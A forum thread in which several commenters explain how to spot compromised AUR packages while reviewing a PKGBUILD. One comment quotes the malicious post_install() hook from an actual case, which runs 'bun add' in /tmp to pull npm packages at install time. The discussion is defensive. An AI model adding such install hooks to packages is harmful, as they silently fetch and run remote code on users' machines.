DavideNL, an hour ago:
Curious, in this specific case: if people DID review the PKGBUILD, what exactly would they recognize to spot these packages were compromised?
Tharre, an hour ago:
From the concrete example someone posted below, you'd see that a post-install hook exists, literally this line:

> install=toggldesktop-bin-deps.install

And the toggldesktop-bin-deps.install contains this:

> post_install() {
>     cd /tmp
>     bun add axios uuid ora js-digest
> }

Seeing any install hook download anything from the web should immediately raise alarms when reviewing, even before you check out what packages it actually installs.
Matl, an hour ago:
Some things I try to check for:

- sources array has sources that don't correlate to the package name/purpose or are from strange places, like github repos that don't seem relevant etc.
- extensive post install scripts suggesting it's doing a lot more than is normal

But those are very crude, I wonder if an AUR helper could optionally consult a local LLM to review a PKGBUILD before installing these days...
weaksauce, an hour ago:
Typically attacks happen when the URL for the source code or binary gets changed significantly... or, like in this attack, someone adds something to the post_install section which does something like add an npm install command. A lot of updates for binaries are just version bumps and SHA hashes changing, which are easy to vet if you trust the source to not be compromised.